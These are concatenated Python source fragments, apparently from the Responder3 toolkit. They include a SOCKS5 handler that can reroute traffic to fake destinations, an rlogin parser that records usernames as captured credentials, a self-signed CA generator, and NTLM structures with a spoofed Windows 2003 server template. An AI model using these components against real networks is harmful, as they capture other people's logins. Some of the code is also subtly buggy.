					#put GSSAPI implementation here
					raise Exception('Not implemented!')

			elif self.session.current_state == SOCKS5ServerState.REQUEST:
				await self.logger.debug('Remote client wants to connect to %s:%d' % (str(msg.DST_ADDR), msg.DST_PORT))
				if msg.CMD == SOCKS5Command.CONNECT:
					if self.session.proxymode == SOCKS5ServerMode.OFF:
						#so long and thanks for all the fish...
						return

					elif self.session.proxymode == SOCKS5ServerMode.NORMAL:
						#in this case the server acts as a normal socks5 server
						proxy_reader, proxy_writer = await asyncio.wait_for(asyncio.open_connection(host=str(msg.DST_ADDR),port = msg.DST_PORT), timeout=1)
						await self.logger.debug('Connected!')
						self.session.current_state = SOCKS5ServerState.RELAYING
						t = await asyncio.wait_for(self.send_data(SOCKS5Reply.construct(SOCKS5ReplyType.SUCCEEDED, self.session.allinterface, 0).to_bytes()), timeout = 1)
						self.loop.create_task(self.proxy_forwarder(proxy_reader, self.cwriter, (str(msg.DST_ADDR),int(msg.DST_PORT)), self.caddr))
						self.loop.create_task(self.proxy_forwarder(self.creader, proxy_writer, self.caddr, (str(msg.DST_ADDR),int(msg.DST_PORT))))

						await asyncio.wait_for(self.session.proxy_closed.wait(), timeout = None)
						return
						
					else:
						#in this case we route the traffic to a specific server :)
						fake_dest_ip, fake_dest_port = self.fake_dest_lookup(str(msg.DST_ADDR), msg.DST_PORT)
						if fake_dest_ip is None:
							await self.logger.debug('Could not find fake address for %s:%d' % (str(msg.DST_ADDR), msg.DST_PORT))
							return

						else:
							proxy_reader, proxy_writer = await asyncio.wait_for(asyncio.open_connection(host=str(fake_dest_ip),port = fake_dest_port), timeout=1)
							await self.logger.debug('Connected!')
							self.session.current_state = SOCKS5ServerState.RELAYING
							t = await asyncio.wait_for(self.send_data(SOCKS5Reply.construct(SOCKS5ReplyType.SUCCEEDED, self.allinterface, 0).to_bytes()), timeout = 1)
							self.loop.create_task(self.proxy_forwarder(proxy_reader, self.cwriter, (str(fake_dest_ip),int(fake_dest_port)), self.caddr))
							self.loop.create_task(self.proxy_forwarder(self.creader, proxy_writer, self.caddr,  (str(fake_dest_ip),int(fake_dest_port))))

							await asyncio.wait_for(self.session.proxy_closed.wait(), timeout = None)
							return

				else:
					t = await asyncio.wait_for(SOCKS5Reply.construct(SOCKS5ReplyType.COMMAND_NOT_SUPPORTED, self.session.allinterface, 0).to_bytes(), timeout = 1)
					return				
					


#https://tools.ietf.org/html/rfc1282
import io
import enum
import asyncio
import traceback

from responder3.core.logging.log_objects import Credential
from responder3.core.commons import read_element
from responder3.core.asyncio_helpers import *


class RloginSessionState:
	BEFORE_AUTH = enum.auto()
	AFTER_AUTH = enum.auto()

class AuthenticationMessage:
	def __init__(self):
		self.user_name = None
		self.server_name = None
		self.terminal_type = None
		self.terminal_speed = None

	async def from_streamreader(reader, timeout = 60):
		am = AuthenticationMessage()
		t = await readexactly_or_exc(reader, 1, timeout=timeout)
		if t != b'\x00':
			raise Exception('Wrong protocol!')

		user = await readuntil_or_exc(reader, b'\x00', timeout=timeout)
		am.user_name = user.decode()

		server = await readuntil_or_exc(reader, b'\x00', timeout=timeout)
		am.server_name = server.decode()

		terminal = await readuntil_or_exc(reader, b'\x00', timeout=timeout)
		am.terminal_type, am.terminal_speed = terminal.decode().split('/')

		return am

	def to_bytes(self):
		t = b'\x00'
		t += self.user_name.encode() + b'\x00'
		t += self.server_name.encode() + b'\x00'
		t += self.terminal_type.encode() + b'\x00'
		return t

	def to_credential(self):
		return Credential('PLAIN',
						  username=self.user_name,
						  fullhash='%s:%s' % (self.user_name, '')
						  )


from oscrypto import asymmetric
from certbuilder import CertificateBuilder, pem_armor_certificate
import sys
import pathlib

def generate_cert_and_key(cn, filename, keysize, keytype = 'rsa'):
	ca_key_name  = '%s.key' % filename
	ca_cert_name = '%s.crt' % filename

	curdir = pathlib.Path(__file__).parent


	# Generate and save the key and certificate for the root CA
	root_ca_public_key, root_ca_private_key = asymmetric.generate_pair(keytype, bit_size=keysize)

	with open(curdir.joinpath(ca_key_name), 'wb') as f:
		f.write(asymmetric.dump_private_key(root_ca_private_key, None))

	builder = CertificateBuilder(
		{
			'country_name': 'US',
			'state_or_province_name': 'Massachusetts',
			'locality_name': 'Newbury',
			'organization_name': 'Codex Non Sufficit LC',
			'common_name': cn,
		},
		root_ca_public_key
	)
	builder.self_signed = True
	builder.ca = True
	root_ca_certificate = builder.build(root_ca_private_key)

	with open(curdir.joinpath(ca_cert_name), 'wb') as f:
		f.write(pem_armor_certificate(root_ca_certificate))


if __name__ == '__main__':
	import argparse
	parser = argparse.ArgumentParser(description='Quick self-signed cert generator')
	parser.add_argument('cn', default=1024, help='CN field')
	parser.add_argument('-o', default='responder3', help='output file base name')
	parser.add_argument('-b', type=int, default=1024, help='RSA key size in bits')
	args =  parser.parse_args()
	
	print('[+] Genearting cert and key...')
	generate_cert_and_key(args.cn, args.o, args.b)
	print('[+] Done!')


import io
import os
import enum
import base64
import collections
import hmac

from responder3.crypto.symmetric import DES
from responder3.crypto.hashing import *
from responder3.core.commons import timestamp2datetime
from responder3.core.logging.log_objects import Credential
from responder3.protocols.SMB.ntstatus import *
from responder3.protocols.authentication.common import *


# https://msdn.microsoft.com/en-us/library/cc236650.aspx
class NegotiateFlags(enum.IntFlag):
	NEGOTIATE_56   = 0x80000000
	NEGOTIATE_KEY_EXCH   = 0x40000000
	NEGOTIATE_128   = 0x20000000
	r1  = 0x10000000
	r2  = 0x8000000
	r3  = 0x4000000
	NEGOTIATE_VERSION   = 0x2000000
	r4  = 0x1000000
	NEGOTIATE_TARGET_INFO   = 0x800000
	REQUEST_NON_NT_SESSION_KEY   = 0x400000
	r5  = 0x200000
	NEGOTIATE_IDENTIFY   = 0x100000
	NEGOTIATE_EXTENDED_SESSIONSECURITY   = 0x80000
	r6  = 0x40000
	TARGET_TYPE_SERVER   = 0x20000
	TARGET_TYPE_DOMAIN   = 0x10000
	NEGOTIATE_ALWAYS_SIGN   = 0x8000
	r7  = 0x4000
	NEGOTIATE_OEM_WORKSTATION_SUPPLIED   = 0x2000
	NEGOTIATE_OEM_DOMAIN_SUPPLIED   = 0x1000
	J   = 0x800
	r8  = 0x400
	NEGOTIATE_NTLM   = 0x200
	r9  = 0x100
	NEGOTIATE_LM_KEY   = 0x80
	NEGOTIATE_DATAGRAM   = 0x40
	NEGOTIATE_SEAL   = 0x20
	NEGOTIATE_SIGN   = 0x10
	r10 = 0x8
	REQUEST_TARGET   = 0x4
	NTLM_NEGOTIATE_OEM   = 0x2
	NEGOTIATE_UNICODE   = 0x1
		
NegotiateFlagExp = {
	NegotiateFlags.NEGOTIATE_56   : 'requests 56-bit encryption. If the client sends NTLMSSP_NEGOTIATE_SEAL or NTLMSSP_NEGOTIATE_SIGN with NTLMSSP_NEGOTIATE_56 to the server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_56 to the client in the CHALLENGE_MESSAGE.   Otherwise it is ignored. If both NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 are requested and supported by the client and server, NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 will both be returned to the client. Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD set NTLMSSP_NEGOTIATE_56 if it is supported. An alternate name for this field is NTLMSSP_NEGOTIATE_56.',
	NegotiateFlags.NEGOTIATE_KEY_EXCH   : 'requests an explicit key exchange. This capability SHOULD be used because it improves security for message integrity or confidentiality. See sections 3.2.5.1.2, 3.2.5.2.1, and 3.2.5.2.2 for details. An alternate name for this field is NTLMSSP_NEGOTIATE_KEY_EXCH.',
	NegotiateFlags.NEGOTIATE_128  : 'requests 128-bit session key negotiation. An alternate name for this field is NTLMSSP_NEGOTIATE_128. If the client sends NTLMSSP_NEGOTIATE_128 to the server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_128 to the client in the CHALLENGE_MESSAGE only if the client sets NTLMSSP_NEGOTIATE_SEAL or NTLMSSP_NEGOTIATE_SIGN. Otherwise it is ignored. If both NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 are requested and supported by the client and server, NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 will both be returned to the client. Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD set NTLMSSP_NEGOTIATE_128 if it is supported. An alternate name for this field is NTLMSSP_NEGOTIATE_128.<23>',
	NegotiateFlags.r1  : 'This bit is unused and MUST be zero.',
	NegotiateFlags.r2  : 'This bit is unused and MUST be zero.',
	NegotiateFlags.r3  : 'This bit is unused and MUST be zero.',
	NegotiateFlags.NEGOTIATE_VERSION   : 'requests the protocol version number. The data corresponding to this flag is provided in the Version field of the NEGOTIATE_MESSAGE, the CHALLENGE_MESSAGE, and the AUTHENTICATE_MESSAGE.<24> An alternate name for this field is NTLMSSP_NEGOTIATE_VERSION.',
	NegotiateFlags.r4  : 'This bit is unused and MUST be zero.',
	NegotiateFlags.NEGOTIATE_TARGET_INFO   : 'indicates that the TargetInfo fields in the CHALLENGE_MESSAGE (section 2.2.1.2) are populated. An alternate name for this field is NTLMSSP_NEGOTIATE_TARGET_INFO.',
	NegotiateFlags.REQUEST_NON_NT_SESSION_KEY   : ' requests the usage of the LMOWF. An alternate name for this field is NTLMSSP_REQUEST_NON_NT_SESSION_KEY.',
	NegotiateFlags.r5  : 'This bit is unused and MUST be zero.',
	NegotiateFlags.NEGOTIATE_IDENTIFY   : 'requests an identify level token. An alternate name for this field is NTLMSSP_NEGOTIATE_IDENTIFY.',
	NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY  : 'requests usage of the NTLM v2 session security. NTLM v2 session security is a misnomer because it is not NTLM v2. It is NTLM v1 using the extended session security that is also in NTLM v2. NTLMSSP_NEGOTIATE_LM_KEY and NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are mutually exclusive. If both NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY and NTLMSSP_NEGOTIATE_LM_KEY are requested, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY alone MUST be returned to the client. NTLM v2 authentication session key generation MUST be supported by both the client and the DC in order to be used, and extended  session security signing and sealing requires support from the client and the server in order to be used.<25> An alternate name for this field is NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY.',
	NegotiateFlags.r6  : 'This bit is unused and MUST be zero.',
	NegotiateFlags.TARGET_TYPE_SERVER   : 'TargetName MUST be a server name. The data corresponding to this flag is provided by the server in the TargetName field of the CHALLENGE_MESSAGE. If this bit is set, then NTLMSSP_TARGET_TYPE_DOMAIN MUST NOT be set. This flag MUST be ignored in the NEGOTIATE_MESSAGE and the AUTHENTICATE_MESSAGE. An alternate name for this field is NTLMSSP_TARGET_TYPE_SERVER.',
	NegotiateFlags.TARGET_TYPE_DOMAIN   : 'TargetName MUST be a domain name. The data corresponding to this flag is provided by the server in the TargetName field of the CHALLENGE_MESSAGE. then NTLMSSP_TARGET_TYPE_SERVER MUST NOT be set. This flag MUST be ignored in the NEGOTIATE_MESSAGE and the AUTHENTICATE_MESSAGE. An alternate name for this field is NTLMSSP_TARGET_TYPE_DOMAIN.',
	NegotiateFlags.NEGOTIATE_ALWAYS_SIGN   : ' requests the presence of a signature block on all messages. NTLMSSP_NEGOTIATE_ALWAYS_SIGN MUST be set in the NEGOTIATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client. NTLMSSP_NEGOTIATE_ALWAYS_SIGN is overridden by NTLMSSP_NEGOTIATE_SIGN and NTLMSSP_NEGOTIATE_SEAL, if they are supported. An alternate name for this field is NTLMSSP_NEGOTIATE_ALWAYS_SIGN.',
	NegotiateFlags.r7  : 'This bit is unused and MUST be zero.',
	NegotiateFlags.NEGOTIATE_OEM_WORKSTATION_SUPPLIED   : 'This flag indicates whether the Workstation field is present. If this flag is not set, the Workstation field MUST be ignored. If this flag is set, the length of the Workstation field specifies whether the workstation name is nonempty or not.<26> An alternate name for this field is NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED.',
	NegotiateFlags.NEGOTIATE_OEM_DOMAIN_SUPPLIED   : 'the domain name is provided (section 2.2.1.1).<27> An alternate name for this field is NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED.',
	NegotiateFlags.J   : 'the connection SHOULD be anonymous.<28>',
	NegotiateFlags.r8  : 'This bit is unused and MUST be zero.',
	NegotiateFlags.NEGOTIATE_NTLM   : 'requests usage of the NTLM v1 session security protocol. NTLMSSP_NEGOTIATE_NTLM MUST be set in the NEGOTIATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client. An alternate name for this field is NTLMSSP_NEGOTIATE_NTLM.',
	NegotiateFlags.r9  : 'This bit is unused and MUST be zero.',
	NegotiateFlags.NEGOTIATE_LM_KEY   : 'requests LAN Manager (LM) session key computation. NTLMSSP_NEGOTIATE_LM_KEY and NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are mutually exclusive. If both NTLMSSP_NEGOTIATE_LM_KEY and NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are requested, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY alone MUST be returned to the client. NTLM v2 authentication session key generation MUST be supported by both the client and the DC in order to be used, and extended session security signing and sealing requires support from the client and the server to be used. An alternate name for this field is NTLMSSP_NEGOTIATE_LM_KEY.',
	NegotiateFlags.NEGOTIATE_DATAGRAM   : 'requests connectionless authentication. If NTLMSSP_NEGOTIATE_DATAGRAM is set, then NTLMSSP_NEGOTIATE_KEY_EXCH MUST always be set in the AUTHENTICATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client. An alternate name for this field is NTLMSSP_NEGOTIATE_DATAGRAM',
	NegotiateFlags.NEGOTIATE_SEAL   : 'requests session key negotiation for message confidentiality. If the client sends NTLMSSP_NEGOTIATE_SEAL to the server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_SEAL to the client in the CHALLENGE_MESSAGE. Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD always set NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128, if they are supported. An alternate name for this field is NTLMSSP_NEGOTIATE_SEAL.',
	NegotiateFlags.NEGOTIATE_SIGN   : 'requests session key negotiation for message signatures. If the client sends NTLMSSP_NEGOTIATE_SIGN to the server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_SIGN to the client in the CHALLENGE_MESSAGE. An alternate name for this field is NTLMSSP_NEGOTIATE_SIGN.',
	NegotiateFlags.r10 : 'This bit is unused and MUST be zero.',
	NegotiateFlags.REQUEST_TARGET   : 'TargetName field of the CHALLENGE_MESSAGE (section 2.2.1.2) MUST be supplied. An alternate name for this field is NTLMSSP_REQUEST_TARGET.',
	NegotiateFlags.NTLM_NEGOTIATE_OEM   : 'requests OEM character set encoding. An alternate name for this field is NTLM_NEGOTIATE_OEM. See bit A for details.',
	NegotiateFlags.NEGOTIATE_UNICODE   : 'requests Unicode character set encoding. An alternate name for this field is NTLMSSP_NEGOTIATE_UNICODE.',

}


class NTLMRevisionCurrent(enum.Enum):
	NTLMSSP_REVISION_W2K3 = 0x0F


# https://msdn.microsoft.com/en-us/library/cc236722.aspx#Appendix_A_33
class WindowsMajorVersion(enum.Enum):
	WINDOWS_MAJOR_VERSION_5  = 0x05
	WINDOWS_MAJOR_VERSION_6  = 0x06
	WINDOWS_MAJOR_VERSION_10 = 0x0A


# https://msdn.microsoft.com/en-us/library/cc236722.aspx#Appendix_A_33
class WindowsMinorVersion(enum.Enum):
	WINDOWS_MINOR_VERSION_0 = 0x00
	WINDOWS_MINOR_VERSION_1 = 0x01
	WINDOWS_MINOR_VERSION_2 = 0x02
	WINDOWS_MINOR_VERSION_3 = 0x03

# https://msdn.microsoft.com/en-us/library/cc236722.aspx#Appendix_A_33
WindowsProduct = {
	(WindowsMajorVersion.WINDOWS_MAJOR_VERSION_5, WindowsMinorVersion.WINDOWS_MINOR_VERSION_1) : 'Windows XP operating system Service Pack 2 (SP2)',
	(WindowsMajorVersion.WINDOWS_MAJOR_VERSION_5, WindowsMinorVersion.WINDOWS_MINOR_VERSION_2) : 'Windows Server 2003',
	(WindowsMajorVersion.WINDOWS_MAJOR_VERSION_6, WindowsMinorVersion.WINDOWS_MINOR_VERSION_0) : 'Windows Vista or Windows Server 2008',
	(WindowsMajorVersion.WINDOWS_MAJOR_VERSION_6, WindowsMinorVersion.WINDOWS_MINOR_VERSION_1) : 'Windows 7 or Windows Server 2008 R2',
	(WindowsMajorVersion.WINDOWS_MAJOR_VERSION_6, WindowsMinorVersion.WINDOWS_MINOR_VERSION_2) : 'Windows 8 or Windows Server 2012 operating system',
	(WindowsMajorVersion.WINDOWS_MAJOR_VERSION_6, WindowsMinorVersion.WINDOWS_MINOR_VERSION_3) : 'Windows 8.1 or Windows Server 2012 R2',
	(WindowsMajorVersion.WINDOWS_MAJOR_VERSION_10,WindowsMinorVersion.WINDOWS_MINOR_VERSION_0) : 'Windows 10 or Windows Server 2016',
}


class AVPAIRType(enum.Enum):
	MsvAvEOL             = 0x0000 #Indicates that this is the last AV_PAIR in the list. AvLen MUST be 0. This type of information MUST be present in the AV pair list.
	MsvAvNbComputerName  = 0x0001 #The server's NetBIOS computer name. The name MUST be in Unicode, and is not null-terminated. This type of information MUST be present in the AV_pair list.
	MsvAvNbDomainName    = 0x0002 #The server's NetBIOS domain name. The name MUST be in Unicode, and is not null-terminated. This type of information MUST be present in the AV_pair list.
	MsvAvDnsComputerName = 0x0003 #The fully qualified domain name (FQDN) of the computer. The name MUST be in Unicode, and is not null-terminated.
	MsvAvDnsDomainName   = 0x0004 #The FQDN of the domain. The name MUST be in Unicode, and is not null-terminated.
	MsvAvDnsTreeName     = 0x0005 #The FQDN of the forest. The name MUST be in Unicode, and is not null-terminated.<13>
	MsvAvFlags           = 0x0006 #A 32-bit value indicating server or client configuration.
	MsvAvTimestamp       = 0x0007 #A FILETIME structure ([MS-DTYP] section 2.3.3) in little-endian byte order that contains the server local time. This structure is always sent in the CHALLENGE_MESSAGE.<16>
	MsvAvSingleHost      = 0x0008 #A Single_Host_Data (section 2.2.2.2) structure. The Value field contains a platform-specific blob, as well as a MachineID created at computer startup to identify the calling machine.<17>
	MsvAvTargetName      = 0x0009 #The SPN of the target server. The name MUST be in Unicode and is not null-terminated.<18>
	MsvChannelBindings   = 0x000A #A channel bindings hash. The Value field contains an MD5 hash ([RFC4121] section 4.1.1.2) of a gss_channel_bindings_struct ([RFC2744] section 3.11). An all-zero value of the hash is used to indicate absence of channel bindings.<19>


# ???? https://msdn.microsoft.com/en-us/library/windows/desktop/aa374793(v=vs.85).aspx
# https://msdn.microsoft.com/en-us/library/cc236646.aspx
class AVPairs(collections.UserDict):
	"""
	AVPairs is a dictionary-like object that stores the "AVPair list" in a key -value format where key is an AVPAIRType object and value is the corresponding object defined by the MSDN documentation. Usually it's string but can be other object as well
	"""
	def __init__(self, data = None):
		collections.UserDict.__init__(self, data)

	@staticmethod
	def from_bytes(bbuff):
		return AVPairs.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		avp = AVPairs()
		while True:
			avId  = AVPAIRType(int.from_bytes(buff.read(2), byteorder = 'little', signed = False))
			AvLen = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
			if avId == AVPAIRType.MsvAvEOL:
				break

			elif avId in [AVPAIRType.MsvAvNbComputerName,
						  AVPAIRType.MsvAvNbDomainName,
						  AVPAIRType.MsvAvDnsComputerName,
						  AVPAIRType.MsvAvDnsDomainName,
						  AVPAIRType.MsvAvDnsTreeName,
						  AVPAIRType.MsvAvTargetName,
			]:
				avp[avId] = buff.read(AvLen).decode('utf-16le')

			# TODO IMPLEMENT PARSING OFR OTHER TYPES!!!!
			else:
				avp[avId] = buff.read(AvLen)

		return avp

	def to_bytes(self):
		t = b''
		for av in self.data:
			t += AVPair(data = self.data[av], type = av).to_bytes()

		t+= AVPair(data = '', type = AVPAIRType.MsvAvEOL).to_bytes()
		return t


class AVPair:
	def __init__(self, data = None, type = None):
		self.type = type
		self.data = data

	def to_bytes(self):
		t  = self.type.value.to_bytes(2, byteorder = 'little', signed = False)
		t += len(self.data.encode('utf-16le')).to_bytes(2, byteorder = 'little', signed = False)
		t += self.data.encode('utf-16le')
		return t


class Fields:
	def __init__(self, length, offset, maxLength = None):
		self.length = length
		self.maxLength = length if maxLength is None else maxLength
		self.offset = offset

	@staticmethod
	def from_bytes(bbuff):
		return Fields.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer( buff):
		length    = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
		maxLength = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
		offset    = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)

		return Fields(length, offset, maxLength = maxLength)

	def to_bytes(self):
		return  self.length.to_bytes(2, byteorder = 'little', signed = False) + \
				self.maxLength.to_bytes(2, byteorder = 'little', signed = False) + \
				self.offset.to_bytes(4, byteorder = 'little', signed = False)

class Version:
	def __init__(self):
		self.ProductMajorVersion = None
		self.ProductMinorVersion = None
		self.ProductBuild        = None
		self.Reserved            = None
		self.NTLMRevisionCurrent = None

		# higher level
		self.WindowsProduct = None

	def to_bytes(self):
		t = self.ProductMajorVersion.value.to_bytes(1, byteorder = 'little', signed = False)
		t += self.ProductMinorVersion.value.to_bytes(1, byteorder = 'little', signed = False)
		t += self.ProductBuild.to_bytes(2, byteorder = 'little', signed = False)
		t += self.Reserved.to_bytes(3, byteorder = 'little', signed = False)
		t += self.NTLMRevisionCurrent.value.to_bytes(1, byteorder = 'little', signed = False)
		return t

	@staticmethod
	def from_bytes(bbuff):
		return Version.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		v = Version()
		v.ProductMajorVersion = WindowsMajorVersion(int.from_bytes(buff.read(1), byteorder = 'little', signed = False))
		v.ProductMinorVersion = WindowsMinorVersion(int.from_bytes(buff.read(1), byteorder = 'little', signed = False))
		v.ProductBuild        = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
		v.Reserved            = int.from_bytes(buff.read(3), byteorder = 'little', signed = False)
		v.NTLMRevisionCurrent = NTLMRevisionCurrent(int.from_bytes(buff.read(1), byteorder = 'little', signed = False))

		v.WindowsProduct = WindowsProduct[(v.ProductMajorVersion, v.ProductMinorVersion)]

		return v

	def __repr__(self):
		t  = '== NTLMVersion ==\r\n'
		t += 'ProductMajorVersion  : %s\r\n' % repr(self.ProductMajorVersion.name)
		t += 'ProductMinorVersion  : %s\r\n' % repr(self.ProductMinorVersion.name)
		t += 'ProductBuild         : %s\r\n' % repr(self.ProductBuild)
		t += 'WindowsProduct       : %s\r\n' % repr(self.WindowsProduct)
		return t


NTLMServerTemplates = {
		"Windows2003" : {
			'flags'      :  NegotiateFlags.NEGOTIATE_56|NegotiateFlags.NEGOTIATE_128|
							NegotiateFlags.NEGOTIATE_VERSION|NegotiateFlags.NEGOTIATE_TARGET_INFO|
							NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY|
							NegotiateFlags.TARGET_TYPE_DOMAIN|NegotiateFlags.NEGOTIATE_NTLM|
							NegotiateFlags.REQUEST_TARGET|NegotiateFlags.NEGOTIATE_UNICODE ,
			'version'    : Version.from_bytes(b"\x05\x02\xce\x0e\x00\x00\x00\x0f"),
			'targetinfo' : AVPairs({ AVPAIRType.MsvAvNbDomainName    : 'SMB',
								AVPAIRType.MsvAvNbComputerName       : 'SMB-TOOLKIT',
								AVPAIRType.MsvAvDnsDomainName        : 'smb.local',
								AVPAIRType.MsvAvDnsComputerName      : 'server2003.smb.local',
								AVPAIRType.MsvAvDnsTreeName          : 'smb.local',
						   }),

			'targetname' : 'SMB',
		},
}


class NTLMAuthenticate:
	def __init__(self, _use_NTLMv2 = True):
		self.Signature = None
		self.MessageType = None
		self.LmChallengeResponseFields = None
		self.NtChallengeResponseFields = None
		self.DomainNameFields = None
		self.UserNameFields = None
		self.WorkstationFields = None
		self.EncryptedRandomSessionKeyFields = None
		self.NegotiateFlags = None
		self.Version = None
		self.MIC = None
		self.Payload = None

		# high level
		self.LMChallenge = None
		self.NTChallenge = None
		self.DomainName = None
		self.UserName = None
		self.Workstation = None
		self.EncryptedRandomSession = None

		# this is a global variable that needs to be indicated
		self._use_NTLMv2 = _use_NTLMv2

	@staticmethod
	def from_bytes(bbuff,_use_NTLMv2 = True):
		return NTLMAuthenticate.from_buffer(io.BytesIO(bbuff), _use_NTLMv2 = _use_NTLMv2)

	@staticmethod
	def from_buffer(buff, _use_NTLMv2 = True):
		auth = NTLMAuthenticate(_use_NTLMv2)
		auth.Signature    = buff.read(8).decode('ascii')
		auth.MessageType  = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
		auth.LmChallengeResponseFields = Fields.from_buffer(buff)
		auth.NtChallengeResponseFields = Fields.from_buffer(buff)
		auth.DomainNameFields = Fields.from_buffer(buff)
		auth.UserNameFields = Fields.from_buffer(buff)
		auth.WorkstationFields = Fields.from_buffer(buff)
		auth.EncryptedRandomSessionKeyFields = Fields.from_buffer(buff)
		auth.NegotiateFlags = NegotiateFlags(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
		if auth.NegotiateFlags & NegotiateFlags.NEGOTIATE_VERSION: 
			auth.Version = Version.from_buffer(buff)

		# TODO: I'm not sure about this condition!!! Need to test this!
		if auth.NegotiateFlags & NegotiateFlags.NEGOTIATE_ALWAYS_SIGN:
			auth.MIC = int.from_bytes(buff.read(16), byteorder = 'little', signed = False)

		currPos = buff.tell()

		if auth._use_NTLMv2 and auth.NtChallengeResponseFields.length > 24:
			buff.seek(auth.LmChallengeResponseFields.offset, io.SEEK_SET)
			auth.LMChallenge = LMv2Response.from_buffer(buff)
			

			buff.seek(auth.NtChallengeResponseFields.offset, io.SEEK_SET)
			auth.NTChallenge = NTLMv2Response.from_buffer(buff)

		else:
			buff.seek(auth.LmChallengeResponseFields.offset, io.SEEK_SET)
			auth.LMChallenge = LMResponse.from_buffer(buff)
				
			buff.seek(auth.NtChallengeResponseFields.offset, io.SEEK_SET)
			auth.NTChallenge = NTLMv1Response.from_buffer(buff)

		buff.seek(auth.DomainNameFields.offset,io.SEEK_SET)
		auth.DomainName = buff.read(auth.DomainNameFields.length).decode('utf-16le')
		
		buff.seek(auth.UserNameFields.offset,io.SEEK_SET)
		auth.UserName = buff.read(auth.UserNameFields.length).decode('utf-16le')

		buff.seek(auth.WorkstationFields.offset,io.SEEK_SET)
		auth.Workstation = buff.read(auth.WorkstationFields.length).decode('utf-16le')

		buff.seek(auth.EncryptedRandomSessionKeyFields.offset,io.SEEK_SET)
		auth.EncryptedRandomSession = buff.read(auth.EncryptedRandomSessionKeyFields.length).decode('utf-16le')
		
		buff.seek(currPos, io.SEEK_SET)

		return auth

	def __repr__(self):
		t  = '== NTLMAuthenticate ==\r\n'
		t += 'Signature     : %s\r\n' % repr(self.Signature)
		t += 'MessageType   : %s\r\n' % repr(self.MessageType)
		t += 'NegotiateFlags: %s\r\n' % repr(self.NegotiateFlags)
		t += 'Version       : %s\r\n' % repr(self.Version)
		t += 'MIC           : %s\r\n' % repr(self.MIC)
		t += 'LMChallenge   : %s\r\n' % repr(self.LMChallenge)
		t += 'NTChallenge   : %s\r\n' % repr(self.NTChallenge)
		t += 'DomainName    : %s\r\n' % repr(self.DomainName)
		t += 'UserName      : %s\r\n' % repr(self.UserName)
		t += 'Workstation   : %s\r\n' % repr(self.Workstation)
		t += 'EncryptedRandomSession: %s\r\n' % repr(self.EncryptedRandomSession)
		return t


# https://msdn.microsoft.com/en-us/library/cc236648.aspx
class LMResponse:
	def __init__(self):
		self.Response = None
		self.raw = None

	@staticmethod
	def from_bytes(bbuff):
		return LMResponse.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		t = LMResponse()
		t.Response = buff.read(24).hex()
		return t

	def __repr__(self):
		t  = '== LMResponse ==\r\n'
		t += 'Response: %s\r\n' % repr(self.Response)
		return t


# https://msdn.microsoft.com/en-us/library/cc236649.aspx
class LMv2Response:
	def __init__(self):
		self.Response = None
		self.ChallengeFromClinet = None

	@staticmethod
	def from_bytes(bbuff):
		return LMv2Response.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		t = LMv2Response()
		t.Response = buff.read(16).hex()
		t.ChallengeFromClinet = buff.read(8).hex()
		return t

	def __repr__(self):
		t  = '== LMv2Response ==\r\n'
		t += 'Response: %s\r\n' % repr(self.Response)
		t += 'ChallengeFromClinet: %s\r\n' % repr(self.ChallengeFromClinet)
		return t


# https://msdn.microsoft.com/en-us/library/cc236651.aspx
class NTLMv1Response:
	def __init__(self):
		self.Response = None

	@staticmethod
	def from_bytes(bbuff):
		return NTLMv1Response.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		t = NTLMv1Response()
		t.Response = buff.read(24).hex()
		return t

	def __repr__(self):
		t  = '== NTLMv1Response ==\r\n'
		t += 'Response: %s\r\n' % repr(self.Response)
		return t


# https://msdn.microsoft.com/en-us/library/cc236653.aspx
class NTLMv2Response:
	def __init__(self):
		self.Response = None
		self.ChallengeFromClinet = None
		self.ChallengeFromClinet_hex = None

	@staticmethod
	def from_bytes(bbuff):
		return NTLMv2Response.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		t = NTLMv2Response()
		t.Response = buff.read(16).hex()
		pos = buff.tell()
		t.ChallengeFromClinet = NTLMv2ClientChallenge.from_buffer(buff)
		pos2 = buff.tell()
		challengeLength = pos2 - pos
		buff.seek(pos, io.SEEK_SET)
